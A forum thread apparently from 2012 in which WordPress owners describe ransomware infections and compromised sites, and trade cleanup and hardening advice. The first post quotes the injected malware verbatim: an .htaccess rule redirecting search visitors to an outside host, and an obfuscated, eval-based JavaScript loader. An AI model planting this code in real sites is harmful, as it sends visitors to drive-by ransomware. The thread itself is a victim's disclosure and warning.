1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

BEWARE! Do You Use W3 Total Cache? Java 7?

Discussion in 'Blogging' started by sforzando, Dec 31, 2012.

  1. sforzando

    sforzando Jr. VIP Jr. VIP Premium Member

    Joined:
    May 27, 2011
    Messages:
    368
    Likes Received:
    120
    If you have the W3 Total Cache wordpress plugin, you need to update it. Any old version is exploitable and the attacker would have full access: http://www.techspot.com/news/51189-...dpress-plugin-exposes-site-database-info.html

    Similarly, Java 7 is exploitable, and the attacker can run any code from a web browser to install malware:
    http://threatpost.com/en_us/blogs/new-java-zero-day-being-used-targeted-attacks-082712
    Apparently if you update you should be OK, but I didn't want to risk that so I DOWNGRADED to Java 6. I uninstalled Java and then downloaded Java 6 Update 37:
    http://www.oldapps.com/java.php

    Yesterday, all of my Wordpress domains were injected with redirect codes to a site that ran a Java exploit to install ransomware. I was freaked out because I had this fake Department of Justice ransomware that locked my computer and asked for money, and that my sites were losing some ranking due to the redirects. I had to start my computer in "Safe Mode with Networking" and followed the tutorial:
    http://malwaretips.com/blogs/department-of-justice-virus/

    The redirect codes were in every .htaccess file, as well as every header.php file I had:

    .htaccess
    Code:
    #336988#
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond  %{HTTP_REFERER}   ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
    RewriteRule ^(.*)$ http://arttresci.com/esd.php [R=301,L]
    </IfModule>
    
    #/336988#
    header.php
    PHP:
    <?
    /*336988*/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
    try{window.document.body++}catch(gdsgsdg){dbshre=30;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new      Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,113,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,114,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,90,108,111,107,106,94,109,94,96,38,92,105,104,38,93,108,94,41,103,96,105,33,54,4,2,25,26,27,23,101,115,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,103,117,37,107,109,115,103,92,38,91,105,109,91,93,107,26,56,23,31,41,33,54,4,2,25,26,27,23,101,115,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,101,115,40,110,107,113,101,95,41,110,97,93,110,99,23,53,25,33,44,103,112,32,53,8,1,24,25,26,27,100,114,39,109,111,112,100,94,40,103,92,94,109,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,103,117,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,102,116,34,32,33,25,117,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,113,109,96,108,94,34,34,51,92,98,112,27,96,92,54,86,34,100,114,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,104,113,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,101,115,35,54,4,2,25,26,27,23,117,6,4,120,32,32,34,53);s="";for(i=0;i-454!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}
    /*/336988*/
    ?>
     
    • Thanks Thanks x 3
    Last edited: Dec 31, 2012
  2. nativepro

    nativepro Power Member

    Joined:
    Jan 30, 2010
    Messages:
    536
    Likes Received:
    533
    One of my wordpress sites was hit with the exact same thing.
     
  3. abbiejenkins

    abbiejenkins Newbie

    Joined:
    Dec 24, 2012
    Messages:
    33
    Likes Received:
    3
    That's funny. I was visiting a blog I always go to almost every day and I saw that same department of justice thing pop up. I was wondering what that was all about. I always try to update everything on WP but I didn't think that plugins could leave such vulnerabilities. I'll definitely be making sure to update all plugins after reading this
     
  4. AgentD

    AgentD Newbie

    Joined:
    Jan 1, 2013
    Messages:
    4
    Likes Received:
    0
    Wait a minute here, the SAME exact thing happened to me too. On the 23rd I was randomly surfing some website when suddenly my computer locks up and the Department of Justice screen freezes everything, even my webcam turned on. I took some steps to get rid of it and left home for Christmas. I come back on the 26th to a dead server with a bunch of malicious code injected on various accounts/websites, EXACTLY like the one you posted. The whole htaccess/header.php redirect. Yes, my websites were Wordpress as well. One of them wasn't, and it still got compromised. While I was investigating the issue, my computer locks up and I freak out. I reinstall my OS and reformat my HDD to completely get rid of the virus. I cleaned up my server and decided to switch hosts for my main site. I was offline for 6 days and the repercussions upset me. I don't receive as much revenue from Google AdSense anymore, and my Google Analytics Stats dropped down by half. I am now on a new server, with a brand new wordpress database, and I still feel something is wrong, like if a percentage of my traffic is being redirected. Is there any way to tell? Perhaps I am being paranoid and the 6 days of downtime was the cause but the thing that made me want to post in here is that my WordPress sites weren't using the plugins you mentioned. They got in somehow, and a faulty plugin doesn't convince me. Something's up.
     
  5. sforzando

    sforzando Jr. VIP Jr. VIP Premium Member

    Joined:
    May 27, 2011
    Messages:
    368
    Likes Received:
    120
    I feel for you man. Luckily I had experience with this before so I didn't lose too much revenue from Adsense. Last year there was a similar exploit for a "timthumb.php" file, which is common in many plugins and themes. Try installing http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/ on every WordPress installation to check if you have any outdated timthumb.php files. Update all your plugins and Wordpress. Disable and delete any plugins you don't use. Install Wordpress Firewall 2: http://wordpress.org/extend/plugins/wordpress-firewall-2/ or whatever security plugin you like.

    I'm pretty sure the attackers run automated scripts to find sites that have outdated timthumb.php, old WP versions, and old W3 Total Caches to automatically inject their code. I'd change my Wordpress login passes, FTP, Cpanel, etc just in case the attacker logged those. Have your rankings declined from redirects? My site took a hit but after I removed the redirect it went back to its original ranking.
     
  6. sforzando

    sforzando Jr. VIP Jr. VIP Premium Member

    Joined:
    May 27, 2011
    Messages:
    368
    Likes Received:
    120
    A Hostgator admin responded to my ticket when I asked how the attacker got in. Apparently the attacker logged in via FTP, so I know what happened:

    1. I visit a page like 5 days ago with Java 7 exploit and it installed DOJ ransomware + password sniffer.
    2. Removed ransomware from my computer, thought that was the end of it.
    3. Attacker logs into FTP and injects redirects.
    4. I visit my page and get redirected and get the exact same virus again.

    So yeah, you'd better change all your passwords that you use on your computer. They like to use emails to send spam to your contacts.
     
  7. kideze

    kideze Elite Member

    Joined:
    Jun 23, 2009
    Messages:
    1,719
    Likes Received:
    330
    Location:
    the GRAND valley
    That webcam shit is scary.
     
  8. oscaroxy

    oscaroxy Newbie

    Joined:
    Jan 17, 2013
    Messages:
    2
    Likes Received:
    0
    I've had same virus, I from Italy so the virus that block my pc wrote "Polizia di stato", it's same your virus. I removed it from my pc, but it has infect all my wordpress site, now every day I must clear the htaccess, index.php and header.php from all my wordpress site.
    I state that I'll format my pc (though if avast have deleted all virus from pc), but now how do I do remove this virus from my wordpress site?
    I read your advice: reinstall wordpress, change password, install plugin scan, but I haven't a backup of the files...
    help me, thanks
     
  9. irmscher

    irmscher Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 18, 2011
    Messages:
    660
    Likes Received:
    128
    Thanks for the heads up! there was even a notification in wp admin about security issues in the old versions, hope the it's fixed in the updated version properly. After I saw some posts here I thought... probably I should renew my Kaspersky subscription :)
     
  10. blue_wings

    blue_wings Newbie

    Joined:
    Feb 2, 2011
    Messages:
    47
    Likes Received:
    71
    Location:
    Romania
    Actually, you would be secure even with that insecure W3TC plugin if you have hardened your hosting account security. One of the first things I do after installing Wordpress or any other CMS is to add some rules to the .htaccess file. This is the one I am talking about:

    Options -Indexes


    With that one, none can browse through your folders on your hosting account. So they cannot get the DB cache, unless they can guess the hashes in the names... which looks like this:
     
  11. oscaroxy

    oscaroxy Newbie

    Joined:
    Jan 17, 2013
    Messages:
    2
    Likes Received:
    0
    About you, if I give to htaccess 444 permission and block the chmod function from php (disable_functions from php.ini) can I resolve with my wordpress site infected?

    Now every day, or to the max after same days (2 or 3) I reread the trojan on my htaccess, index.php and header.php

    thanks
     
    Last edited: Jan 18, 2013